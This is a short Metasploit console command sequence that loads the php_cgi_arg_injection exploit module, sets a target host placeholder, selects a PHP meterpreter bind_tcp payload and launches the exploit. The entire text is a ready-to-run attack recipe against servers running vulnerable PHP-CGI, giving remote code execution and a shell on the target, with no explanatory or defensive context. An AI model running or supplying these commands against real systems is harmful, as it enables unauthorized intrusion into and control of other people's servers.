> use exploit/multi/http/php_cgi_arg_injection > set rhost IP > set PAYLOAD php/meterpreter/bind_tcp > exploit